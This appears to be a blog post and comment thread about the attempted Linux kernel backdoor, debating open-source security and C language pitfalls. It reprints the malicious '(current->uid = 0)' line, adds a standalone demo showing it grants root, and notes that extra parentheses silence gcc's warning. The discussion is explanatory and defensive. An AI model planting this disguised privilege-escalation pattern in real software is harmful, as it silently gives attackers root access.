Kerneltrap.org reports that somebody tried last week to sneak a snippet of malicious code into the Linux kernel’s source code, to create a backdoor that could be exploited later to seize control of Linux machines. Fortunately, members of the software development team spotted the problem the next day and removed the offending code.
The malicious code snippet was small but it was constructed cleverly, so that most programmers would miss the problem on casual reading of the code.
This incident illuminates an interesting debate on the security tradeoffs between open-source and proprietary code. Opponents of open-source argue that the open development process makes it easier for a bad guy to inject malicious code. Fans of open-source argue that open code makes it easier for the good guys to spot problems. Both groups can find some support in this story, in which an unknown person did inject malicious code, and open-source developers did read the code and spot the problem.
What we don’t know is how often this sort of thing happens in proprietary software development. There must be some attempts to insert malicious code, given the amount of money at stake and the sheer number of people who have the opportunity to try inserting a backdoor. But we don’t know how many people try, or how quickly they are caught.
[Technogeek readers: The offending code is below. Can you spot the problem?
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
]
Abstractions & Language design
Using C derivatives in kernels is acceptable to a degree, but hasn’t the time come to treat such C-level code the way we currently treat assembly? For most application and user-space programs, that argument should be even more persuasive to anyone concerned about computer security.
The problem is the entrenchment of old ideas in the most popular computer languages. Even CPU and hardware architectures are influenced by the amount of legacy code and by the methods used to optimize it.
I’m not a proponent of Java in all cases; its profile can be limiting. But during the ’90s, higher-education computer science programs latched onto it in a big way. Since a good education should provide exposure to alternative approaches, including ones not commercially in vogue, to what degree have Eiffel, OCaml, and Haskell been taught? While these languages aren’t immune to certain types of security problems, they do eliminate a fairly large class of them.
Having worked with C and C++ for many years of my professional career, I don’t think the average programmer is responsible enough to prevent pointer problems, double deletes, buffer overruns, uninitialized data, and silly typos that result in legal programs with radically different semantics. Even with code reviews, testing, and other software-engineering mechanisms, some of these mistakes still get through.
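For instance, a single stray character can yield a program that compiles cleanly but does something entirely different. A hypothetical illustration (not from the kernel incident):

#include <stdio.h>

int main(void)
{
    int balance = 100;

    /* A stray semicolon: the "if" now controls an empty statement,
       and the block below runs unconditionally. Still legal C. */
    if (balance < 0);
    {
        printf("overdrawn!\n");   /* always prints */
    }
    return 0;
}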
While Addison-Wesley and the C++ gurus are happy to keep adding to the Napoleonic codification of how to program “properly” in this language, it’s very possible to forget to apply their advice in an instance or two. Not to mention that the bulk of software developers won’t be interested in becoming the next Herb Sutter or in reading all the “gotchas”. That these gurus nearly had to delay standardization of the C++ standard library to make it exception-safe is a good example of smarties outsmarting themselves. It took them ten years to get the recent incarnations standardized, and the standard is still incomplete: there are no smart pointers suitable for STL containers (auto_ptr won’t do). I shouldn’t need Boost to do the basics.
Computer Science and its pragmatic execution in industry need to advance the art. C# and Java are only a start and are far from perfect.
At times, Herb Sutter and the C++ crowd complement a systems-programming perspective. C++ exception safety, the invalidation of objects in EJB when an EJB exception is thrown, and Eiffel’s departure from most modern languages in how it handles exceptions are all interesting angles on a recurring fundamental issue: an object’s methods should move it from one valid set of member-variable values to another valid set. What happens when an exception is thrown partway through? Most languages, frameworks, and containers do not perform a rollback for you automatically. What does this have to do with computer security? These issues directly affect the consistency and reliability of programs. To program correctly, a language should reduce the number of meta-issues and meta-idioms; otherwise complexity will limit its overall utility.
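The rollback problem is not unique to exception-based languages. In plain C (the language of the kernel under discussion) the same discipline must be hand-rolled with error codes and cleanup paths; a minimal sketch of the idiom, with invented names for illustration:

#include <stdlib.h>
#include <sys/socket.h>

struct conn { int fd; char *buf; };

/* Returns 0 on success, -1 on failure. On failure, every partial
   change is undone, so the caller never sees a half-initialized
   object -- a hand-rolled version of the rollback that, as noted
   above, most languages will not perform for you. */
int conn_init(struct conn *c)
{
    c->buf = malloc(4096);
    if (c->buf == NULL)
        goto fail;

    c->fd = socket(AF_INET, SOCK_STREAM, 0);
    if (c->fd < 0)
        goto free_buf;

    return 0;

free_buf:
    free(c->buf);
    c->buf = NULL;
fail:
    return -1;
}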
The challenge is balancing the different dimensions of software. It should be possible to make progress in certain directions without making significant sacrifices; smaller penalties in other dimensions should allow for greater adoption.
Some comments here:
1. The hack only made it to the public CVS repository, not to the real kernel trees (the most important of which is Linus’s own Bitkeeper tree)
2. The tool that picked up the error was the one that Larry McVoy uses to generate the public CVS tree from BitMover’s Linux tree (the public CVS tree had been modified directly, so the export tool objected).
3. It was only in the subsequent discussion on LKML that it was realised that this was an attempt at inserting a back door.
So what does that mean in terms of the security of open source? It means open source doesn’t magically remove the need for reviews and audits of code going into the tree via legitimate means. It doesn’t magically remove the need to protect your source trees from external hackers inserting code via illegitimate means (e.g. you should at least do what McVoy did and verify public copies against private ones).
What open source _does_ mean, is that every attempt to insert a Trojan is open to external review – and those who are paranoid about security are free to compile their own kernel from source code they trust (assuming they have access to a C compiler they already trust).
Now, how sure are you that a disgruntled employee hasn’t slipped a backdoor trick like this somewhere into the millions of lines of proprietary code that is used every day? Look at how many security bugs get through proprietary QA as it is – what about a deliberately introduced and obfuscated flaw like the one hacked into the Linux public CVS?
Trent, you are correct on both points. C interprets the assignment expression’s value to be the same as the value assigned. This is true for any conditional branching, from “if” to “while” and “for”. In other words, the expression “x = 5” evaluates to “5” (which is nonzero and therefore “true”) in addition to the “side effect” of assigning the value “5” to the variable “x”.
This idiom is somewhat common in C, though heavily discouraged in C++. (Many developers, myself included, consider it to be far more risk than it’s worth.)
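To see the trick concretely, here is a standalone sketch of the same construct (a self-contained rewrite for illustration, not the kernel code itself):

#include <stdio.h>

struct task { int uid; };

int main(void)
{
    struct task t = { 1000 };      /* ordinary, non-root user */
    struct task *current = &t;

    /* The assignment expression's value is the value assigned: 0.
       The condition is therefore always false, so the error path
       never runs -- the only lasting effect is current->uid
       silently becoming 0, i.e. root. */
    if ((current->uid = 0))
        printf("never reached\n");

    printf("uid after the check: %d\n", current->uid);   /* prints 0 */
    return 0;
}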
For more details on this incident:
http://kerneltrap.org/node/view/1584
While it did create a security hole here, the concept of assigning a value to a variable and then testing whether that value is non-zero has some definite uses. I use the technique in PHP code I write: an assignment statement inside a while-loop test both loads data one row at a time from a SQL query and checks whether I have loaded the last row. Example:
while ($row = mysql_fetch_array($result)) {
// code to handle data in $row
}
Now I could be wrong, because it’s been a long time since I programmed in C, but you could do the same thing there. I believe C treats the assigned value as though it were the result of a comparison for the purposes of the while test.
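Indeed, the same pattern is idiomatic C; the classic example assigns and tests in one expression (the extra parentheses around the assignment are deliberate and conventional here):

#include <stdio.h>

int main(void)
{
    int c;

    /* Read characters until EOF: getchar() is called, its result is
       assigned to c, and that same value is compared against EOF. */
    while ((c = getchar()) != EOF)
        putchar(c);

    return 0;
}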
Perhaps gcc should be tweaked to make more noise about assignments used as truth values. This sort of ridiculous obfuscated goo should not be allowed in security-critical code. It’s certainly not necessary.
Isn’t it the case that the code was injected by a cracker who broke into the source code repository and pasted in the malicious code? So the open-source process helped the malefactor by letting them examine the code and find the place to insert the hack, but the rest of the attack could have been executed just as easily against a proprietary software package, right?
Unfortunately, the open-source side loses on both counts in this case. The change was detected by a proprietary tool.
Yup, Trent’s right. I tested something similar. It passed just fine using
“gcc -Wall -pedantic -O”
Brrr … quite an evil little thing, and very easy for a reviewer to miss, as easy as missing a typo.
Ah, but it wouldn’t give you a warning, because it’s encapsulated in an extra set of parentheses. Actually, it’s a rather elegant hack. It’s just a good thing that it was caught in the CVS tree and thus didn’t end up in copies derived from the CVS. From what I have read, it was unlikely to have propagated up to the BitKeeper trees. Of course, this still means some work needs to be done to ascertain how it managed to get into the CVS tree.
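To make the suppression concrete (behavior of mainstream gcc with -Wall; the exact wording of the warning varies by version):

int check(int x)
{
    if (x = 0)        /* gcc -Wall warns: "suggest parentheses
                         around assignment used as truth value" */
        return 1;

    if ((x = 0))      /* the doubled parentheses are gcc's own
                         "yes, I meant it" signal -- no warning */
        return 2;

    return 0;
}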
Interestingly enough, this type of thing would be caught (or at least brought to somebody’s attention) by automated checking programs – such as lint or a good compiler set to maximum warnings. Any experienced code reviewer would also pay extra attention to statements like this.
Putting the condition “(current->uid = 0)” in an _if_ statement makes it look like a classic C coding error – under normal circumstances you would expect “(current->uid == 0)” instead. Having your hacked code generate a [conceptual] warning is not the best way to keep it secret.
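One defensive convention some reviewers enforce makes this class of typo impossible: write the constant on the left, so a dropped “=” becomes a compile error instead of a silent assignment. A small sketch:

struct task { int uid; };

int is_root(const struct task *current)
{
    /* Constant on the left: mistyping this as "0 = current->uid"
       fails to compile ("lvalue required"), rather than silently
       granting root. */
    return (0 == current->uid);
}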